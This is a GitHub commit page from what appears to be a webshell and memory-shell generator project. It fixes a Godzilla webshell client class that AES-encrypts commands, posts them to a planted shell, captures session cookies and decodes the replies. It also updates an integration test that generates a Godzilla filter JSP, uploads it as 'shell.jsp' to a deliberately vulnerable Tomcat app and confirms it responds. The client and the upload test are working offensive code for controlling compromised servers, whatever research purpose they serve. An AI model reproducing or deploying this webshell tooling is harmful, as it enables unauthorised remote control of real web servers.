Skip to content

Commit

Permalink
fix: godzilla manager test failed
Browse files Browse the repository at this point in the history
  • Loading branch information
@ReaJason
ReaJason committed Nov 26, 2024
1 parent 957566f commit 272188a
Show file tree
Hide file tree
Showing 4 changed files with 50 additions and 32 deletions.
50 changes: 29 additions & 21 deletions generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@
public class GodzillaManager implements Closeable {
private final OkHttpClient client;
private static final List<String> CLASS_NAMES;
private String J_SESSION_ID = "";
private String cookie = "";
private String entrypoint;
private String key;
private String pass;
Expand Down Expand Up @@ -96,18 +96,18 @@ public GodzillaManager() {
}

private Response post(byte[] bytes) throws IOException {
byte[] aes = aes(bytes, true);
byte[] aes = aes(this.key, bytes, true);
assert aes != null;
String base64String = Base64.encodeBase64String(aes);
RequestBody requestBody = new FormBody.Builder()
.add("pass", base64String)
.add(this.pass, base64String)
.build();
Request.Builder builder = new Request.Builder()
.url(this.entrypoint)
.post(requestBody)
.headers(Headers.of(this.headers));
if (StringUtils.isNotBlank(J_SESSION_ID)) {
builder.header("Cookie", J_SESSION_ID);
if (StringUtils.isNotBlank(cookie)) {
builder.header("Cookie", cookie);
}
return client.newCall(builder.build()).execute();
}
Expand All @@ -128,7 +128,7 @@ public boolean start() {
try (Response response = post(bytes)) {
String setCookie = response.header("Set-Cookie");
if (setCookie != null && setCookie.contains("JSESSIONID=")) {
J_SESSION_ID = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
cookie = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";"));
}
return response.code() == 200;
} catch (IOException e) {
Expand All @@ -148,7 +148,6 @@ public boolean test() {
}
return false;
} catch (IOException e) {
e.printStackTrace();
return false;
}
}
Expand All @@ -172,39 +171,48 @@ public void close() throws IOException {
* @param encoding 是否为加密,true 为加密,false 解密
* @return 返回加解密后的字节数组
*/
public byte[] aes(byte[] bytes, boolean encoding) {
System.out.println(key);
public static byte[] aes(String key, byte[] bytes, boolean encoding) {
try {
Cipher c = Cipher.getInstance("AES");
c.init(encoding ? 1 : 2, new SecretKeySpec(this.key.getBytes(), "AES"));
c.init(encoding ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
return c.doFinal(bytes);
} catch (Exception e) {
e.printStackTrace();
return null;
return new byte[0];
}
}

private boolean isValidResponse(String response) {
if (StringUtils.isEmpty(response)) {
return false;
}
return response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
return response.length() > 32 && response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16));
}

public String getResultFromRes(String responseBody) throws IOException {
if (!isValidResponse(responseBody)) {
return responseBody;
}
String result = responseBody.substring(16);
result = result.substring(0, result.length() - 16);
byte[] bytes = Base64.decodeBase64(result);
byte[] x = aes(bytes, false);
byte[] x = aes(this.key, bytes, false);
GZIPInputStream gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(x));
return IOUtils.toString(gzipInputStream, StandardCharsets.UTF_8);
}

Map<String, String> restorePayload(String payload) throws IOException {
String p = URLDecoder.decode(payload, "UTF-8");
public static Map<String, String> restorePayload(String key, String payload) {
String p = payload;
try {
String urlDecoded = URLDecoder.decode(payload, "UTF-8");
if (StringUtils.isNoneBlank(urlDecoded)) {
p = urlDecoded;
}
} catch (UnsupportedEncodingException ignored) {

}
Map<String, String> map = new HashMap<>();
byte[] bytes = Base64.decodeBase64(p);
byte[] x = aes(bytes, false);
byte[] x = aes(key, bytes, false);
ByteArrayInputStream tStream = new ByteArrayInputStream(x);
ByteArrayOutputStream tp = new ByteArrayOutputStream();
byte[] lenB = new byte[4];
Expand All @@ -215,16 +223,16 @@ Map<String, String> restorePayload(String payload) throws IOException {
byte t = (byte) inputStream.read();
if (t != -1) {
if (t == 2) {
String key = tp.toString();
int read1 = inputStream.read(lenB);
String dataKey = tp.toString();
inputStream.read(lenB);
int len = bytesToInt(lenB);
byte[] data = new byte[len];
int readOneLen = 0;
do {
read = readOneLen + inputStream.read(data, readOneLen, data.length - readOneLen);
readOneLen = read;
} while (read < data.length);
map.put(key, new String(data));
map.put(dataKey, new String(data));
tp.reset();
} else {
tp.write(t);
Expand All @@ -249,7 +257,7 @@ public static int bytesToInt(byte[] bytes) {
private byte[] generateMethodCallBytes(String methodName) {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);) {
byte[] value = "close".getBytes();
byte[] value = methodName.getBytes();
gzipOutputStream.write("methodName".getBytes());
gzipOutputStream.write(2);
gzipOutputStream.write(intToBytes(value.length));
Expand Down
10 changes: 10 additions & 0 deletions generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,8 @@
import com.reajason.javaweb.util.ClassUtils;
import org.junit.jupiter.api.Test;

import java.util.Map;

import static org.junit.jupiter.api.Assertions.*;

/**
Expand All @@ -18,4 +20,12 @@ void generateGodzilla() {
System.out.println(o.getClass().getName());
assertNotNull(o);
}

@Test
void testRestorePayload(){
String payload = "k2qs7l3%2F4ZZaGyyrfpBQGg0dXGM%2BFVFxzmCWLnyFEgoPSpSjHre4o1HBHTCFnNDX";
String key = "d8ea7326e6ec5916";
Map<String, String> map = GodzillaManager.restorePayload(key, payload);
assertEquals("test", map.get("methodName"));
}
}
6 changes: 3 additions & 3 deletions ...test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -52,8 +52,8 @@ private DynamicTest createCustomContainerTest(String imageName) {
int port = container.getMappedPort(8080);
String url = "http://" + host + ":" + port + "/app";
GodzillaShellConfig shellConfig = GodzillaShellConfig.builder()
.pass("pass").key("key")
.headerName("User-Agent").headerValue("test")
.pass("pass123").key("key123")
.headerName("User-Agent").headerValue("hello_integration_test")
.build();
String jspContent = generateGodzillaFilterJsp(shellConfig);
String filename = "shell.jsp";
Expand Down Expand Up @@ -99,7 +99,7 @@ private void uploadJspFileToServer(String uploadUrl, String filename, String fil
}

private void testGodzillaIsOk(String entrypoint, GodzillaShellConfig shellConfig) {
try (GodzillaManager godzillaManager = new GodzillaManager.GodzillaManagerBuilder()
try (GodzillaManager godzillaManager = GodzillaManager.builder()
.entrypoint(entrypoint)
.pass(shellConfig.getPass())
.key(shellConfig.getKey())
Expand Down
16 changes: 8 additions & 8 deletions vul-webapp/src/main/webapp/WEB-INF/web.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -24,12 +24,12 @@
<url-pattern>/upload</url-pattern>
</servlet-mapping>

<filter>
<filter-name>godzilla</filter-name>
<filter-class>ErrorHandler</filter-class>
</filter>
<filter-mapping>
<filter-name>godzilla</filter-name>
<url-pattern>/test_filter</url-pattern>
</filter-mapping>
<!-- <filter>-->
<!-- <filter-name>godzilla</filter-name>-->
<!-- <filter-class>ErrorHandler</filter-class>-->
<!-- </filter>-->
<!-- <filter-mapping>-->
<!-- <filter-name>godzilla</filter-name>-->
<!-- <url-pattern>/test_filter</url-pattern>-->
<!-- </filter-mapping>-->
</web-app>

0 comments on commit 272188a

Please sign in to comment.